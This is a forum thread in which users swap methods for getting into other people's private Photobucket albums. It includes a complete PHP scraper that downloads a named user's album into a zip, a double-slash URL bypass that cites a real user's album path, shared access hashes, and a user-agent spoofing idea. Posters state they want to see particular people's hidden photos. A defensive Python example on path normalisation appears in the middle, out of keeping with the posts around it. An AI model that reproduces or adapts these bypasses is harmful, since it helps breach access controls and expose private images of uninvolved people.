Canti

Foto Bucket Bypass

228 posts in this topic

i figured out 2 things i thought would work, but instead of taking you to an error page it's just a blank page except with "photobucket.com"

could someone pm me and i can ask them if there's something other than these two? i checked around the internet afterwards and these two had been mentioned, but i don't know about any others.

edit: actually only one takes you to the error page. i think it's the single key address bar one someone mentioned earlier. the other takes you to the image page, but i think photobucket has fixed that.

Edited by DeadAsWarhol

New version that dumps to a zip file.

It's a bit slow but works :)

Also hex is still removed sorry kids ;)



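<?php

// Decode a delimited hex string (e.g. "%68%74...") back into plain text.
function hta($hex, $delimeter = "%")
{
    $hex = str_replace($delimeter, "", $hex);
    $strLength = strlen($hex);
    $returnVal = '';

    for ($i = 0; $i < $strLength; $i += 2) {
        $dec_val = hexdec(substr($hex, $i, 2));
        $returnVal .= chr($dec_val);
    }
    return $returnVal;
}

// Minimal in-memory ZIP archive writer.
class zipfile
{
    public $datasec = array();   // local file headers followed by file data
    public $ctrl_dir = array();  // central directory records
    public $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; // end of central directory signature + disk numbers
    public $old_offset = 0;      // offset of the next local file header

    function add_dir($name)
    {
        $name = str_replace("\\", "/", $name);

        $fr = "\x50\x4b\x03\x04";       // local file header signature
        $fr .= "\x0a\x00";              // version needed to extract
        $fr .= "\x00\x00";              // general purpose bit flag
        $fr .= "\x00\x00";              // compression method: stored
        $fr .= "\x00\x00\x00\x00";      // last modification time and date

        $fr .= pack("V", 0);            // crc32
        $fr .= pack("V", 0);            // compressed size
        $fr .= pack("V", 0);            // uncompressed size
        $fr .= pack("v", strlen($name)); // file name length
        $fr .= pack("v", 0);            // extra field length
        $fr .= $name;

        // Trailing crc32 and sizes: all zero for a directory entry.
        $fr .= pack("V", 0);
        $fr .= pack("V", 0);
        $fr .= pack("V", 0);

        $this->datasec[] = $fr;

        $new_offset = strlen(implode("", $this->datasec));

        $cdrec = "\x50\x4b\x01\x02";    // central directory header signature
        $cdrec .= "\x00\x00";           // version made by
        $cdrec .= "\x0a\x00";           // version needed to extract
        $cdrec .= "\x00\x00";           // general purpose bit flag
        $cdrec .= "\x00\x00";           // compression method: stored
        $cdrec .= "\x00\x00\x00\x00";   // last modification time and date
        $cdrec .= pack("V", 0);         // crc32
        $cdrec .= pack("V", 0);         // compressed size
        $cdrec .= pack("V", 0);         // uncompressed size
        $cdrec .= pack("v", strlen($name)); // file name length
        $cdrec .= pack("v", 0);         // extra field length
        $cdrec .= pack("v", 0);         // file comment length
        $cdrec .= pack("v", 0);         // disk number start
        $cdrec .= pack("v", 0);         // internal file attributes
        $cdrec .= pack("V", 16);        // external file attributes: directory

        $cdrec .= pack("V", $this->old_offset); // offset of the local header
        $this->old_offset = $new_offset;

        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;
    }

    function add_file($data, $name)
    {
        $name = str_replace("\\", "/", $name);

        $fr = "\x50\x4b\x03\x04";       // local file header signature
        $fr .= "\x14\x00";              // version needed to extract
        $fr .= "\x00\x00";              // general purpose bit flag
        $fr .= "\x08\x00";              // compression method: deflate
        $fr .= "\x00\x00\x00\x00";      // last modification time and date

        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // Strip the 2-byte zlib header and 4-byte checksum to leave raw deflate data.
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len = strlen($zdata);
        $fr .= pack("V", $crc);
        $fr .= pack("V", $c_len);
        $fr .= pack("V", $unc_len);
        $fr .= pack("v", strlen($name)); // file name length
        $fr .= pack("v", 0);            // extra field length
        $fr .= $name;
        $fr .= $zdata;
        // Trailing crc32 and sizes after the file data.
        $fr .= pack("V", $crc);
        $fr .= pack("V", $c_len);
        $fr .= pack("V", $unc_len);

        $this->datasec[] = $fr;

        $new_offset = strlen(implode("", $this->datasec));

        $cdrec = "\x50\x4b\x01\x02";    // central directory header signature
        $cdrec .= "\x00\x00";           // version made by
        $cdrec .= "\x14\x00";           // version needed to extract
        $cdrec .= "\x00\x00";           // general purpose bit flag
        $cdrec .= "\x08\x00";           // compression method: deflate
        $cdrec .= "\x00\x00\x00\x00";   // last modification time and date
        $cdrec .= pack("V", $crc);
        $cdrec .= pack("V", $c_len);
        $cdrec .= pack("V", $unc_len);
        $cdrec .= pack("v", strlen($name)); // file name length
        $cdrec .= pack("v", 0);         // extra field length
        $cdrec .= pack("v", 0);         // file comment length
        $cdrec .= pack("v", 0);         // disk number start
        $cdrec .= pack("v", 0);         // internal file attributes
        $cdrec .= pack("V", 32);        // external file attributes: archive
        $cdrec .= pack("V", $this->old_offset); // offset of the local header
        $this->old_offset = $new_offset;

        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;
    }

    // Return the finished archive as a binary string.
    function file()
    {
        $data = implode("", $this->datasec);
        $ctrldir = implode("", $this->ctrl_dir);

        return
            $data .
            $ctrldir .
            $this->eof_ctrl_dir .
            pack("v", sizeof($this->ctrl_dir)) .  // entries on this disk
            pack("v", sizeof($this->ctrl_dir)) .  // entries in total
            pack("V", strlen($ctrldir)) .         // size of the central directory
            pack("V", strlen($data)) .            // offset of the central directory
            "\x00\x00";                           // archive comment length
    }
}

$usr = $_GET['usr'];

$zipfile = new zipfile();

$zipfile->add_dir($usr . "/");

$url = hta("HEX GOES HERE");
// Hex to prevent google from sharing it with the world.

$f = file_get_contents($url . $usr);

preg_match_all('/<DownloadURL>(.*?)<\/DownloadURL>/is', $f, $img);

foreach ($img[1] as $i => $link) {
    // Stop at the first empty entry.
    if ($link == '') {
        break;
    }

    // Skip album index files; everything else goes into the archive.
    if (preg_match('/\.album\.xml/', $link)) {
        continue;
    }

    $filedata = file_get_contents($link);
    $zipfile->add_file($filedata, $usr . "/" . $i . ".gif");
}

header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=" . $usr . ".zip");
echo $zipfile->file();

?>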

Edited by Canti

what i think will be easier for noobs like me if u posted the hex and not the code lol

it's too late for that... people already have the code copied, if he posted the hex it would be complete and people would spam it, thus eliminating its usefulness. I say we also rename the thread because I found this thread on google.

F0t0h Buhket byepass would be a better name for it.


yeah all you will get now is

"<html><body>If you are attempting to use this script for legitimate purposes, please email us at <a href="mailto:userinfo@photobucket.com">userinfo@photobucket.com</a>.</body></html>"


yeah all you will get now is

"<html><body>If you are attempting to use this script for legitimate purposes, please email us at <a href="mailto:userinfo@photobucket.com">userinfo@photobucket.com</a>.</body></html>"

It was fun while it lasted :)

Photobucket staff why would you shut us down? We didn't hurt anything! We just like to rip content! Please oh please give it back!

Edited by Canti

Was good while it lasted, but nothing lasts forever, esp. an exploit :P


yeah damn looks like it's BROKE! lol

good while it lasted

all this time me wanting to get into certain people's photobucket, and when i actually got it working, i forgot whose i wanted to get into lol


trying to wrap my head around some other techniques now. anyone willing to shed light on cookies?


trying to wrap my head around some other techniques now. anyone willing to shed light on cookies?

They taste good :)


i'm pretty sure the filmloop trick still works but you only get the first 50. no matter what they are. sucky sucky


For a while I was having the same thing happen to me as the other guy where I could get read only mode with photobucket accounts, I managed to get it to work for about 2 weeks, but I guess they fixed it or I just stopped doing it right.

Can't win them all I suppose.


lol 426be1b7985b72ec156299adebd25b77 keeps on working, pretty messed up

It's working for you? Good :)

it just stopped working, i guess it doesn't live on forever.

New one:

4deadcc9ee5a7c5ef3c15c6c6c507dd1

is this still a good hash? I tried using and got nowhere.


i just posted a new thread, but it got closed by an admin. please reply.

:

I realize none of the public exploits work, and i'm sure some of you know of working ones but are hesitant to share, because clearly it will be fixed within a short period of time. but i was wondering if all of you could post all the past exploits that worked, so we can all compare and such, in hopes of a new one being discovered. thank you guys.


http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched
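The extra-slash trick in the post above belongs to a general bug class: the access check looks at the raw request path while the file system serves the normalised one. The sketch below is an added example, not code from this thread or from Photobucket; the host, album path and ACL are constructed, and the raw prefix match is an assumed cause, since the thread does not say how the real check worked.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed ACL: album directories their owners marked private (hypothetical data).
PRIVATE_ALBUMS = {"/albums/b00/example_user"}


def naive_listing_allowed(url: str) -> bool:
    """Assumed weak check: match the raw request path against the ACL."""
    path = urlsplit(url).path
    return not any(path.startswith(p) for p in PRIVATE_ALBUMS)


def canonical_path(url: str) -> str:
    """Percent-decode, collapse repeated slashes, resolve '.' and '..' segments."""
    path = unquote(urlsplit(url).path)
    path = re.sub(r"/{2,}", "/", path)
    return posixpath.normpath(path)


def listing_allowed(url: str) -> bool:
    """Hardened check: authorise the canonical path, matching whole segments."""
    path = canonical_path(url)
    return not any(path == p or path.startswith(p + "/") for p in PRIVATE_ALBUMS)


def audit(url: str) -> dict:
    """Decision plus a flag for non-canonical requests, which are worth logging."""
    raw = urlsplit(url).path
    return {
        "allowed": listing_allowed(url),
        "non_canonical": (raw.rstrip("/") or "/") != canonical_path(url),
    }


if __name__ == "__main__":
    for u in (
        "http://img.example.test/albums/b00/example_user/",
        "http://img.example.test///albums/b00/example_user/",
        "http://img.example.test/albums/b00/other_user/",
    ):
        print(u, naive_listing_allowed(u), audit(u))
```

The same canonical form should be used for both the authorisation decision and the file lookup, so the two can never disagree about which directory a request names.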


Is google able to "see" any of the hidden images? I've seen on some sites that search engines can get through, but not anyone else...This is probably unlikely, but it's worth a shot. If it could work..all you'd have to do is appear to be a google bot by switching your user agent (irongeek has a vid.)

Actually...since it's so simple, it probably doesn't work :(

oh well


http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched

are u SERIOUS. that actually worked lol

are u SERIOUS. that actually worked lol

Ya, that was a pretty good one. The best one was the original hack a couple years ago when all you needed to do was put, "?action=viewall" (or whatever it was) at the end and you'd see them all.

Photobucket is known for its 'brilliant' security measures.

Is google able to "see" any of the hidden images?

As far as I know, Google doesn't find the hidden images or index albums. It just pulls from sites and assembles the data.

If you go to http://images.google.com and put "kelly_68 site:photobucket.com" in as your search you'll see that it's not indexing the album, it's just posting links from various sites, in that case, Xanga. It's a nice thought though... ;)

The reason I quoted this after the "brilliant security measures" comment above is because you should NEVER overestimate Photobucket's security. Sometimes the easiest solution is good enough. ;)


http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched

are u SERIOUS. that actually worked lol

Yes it actually worked. I used it for about a day to view all the "banned" albums on photobucket. Someone on their forums told them about it and they patched it.
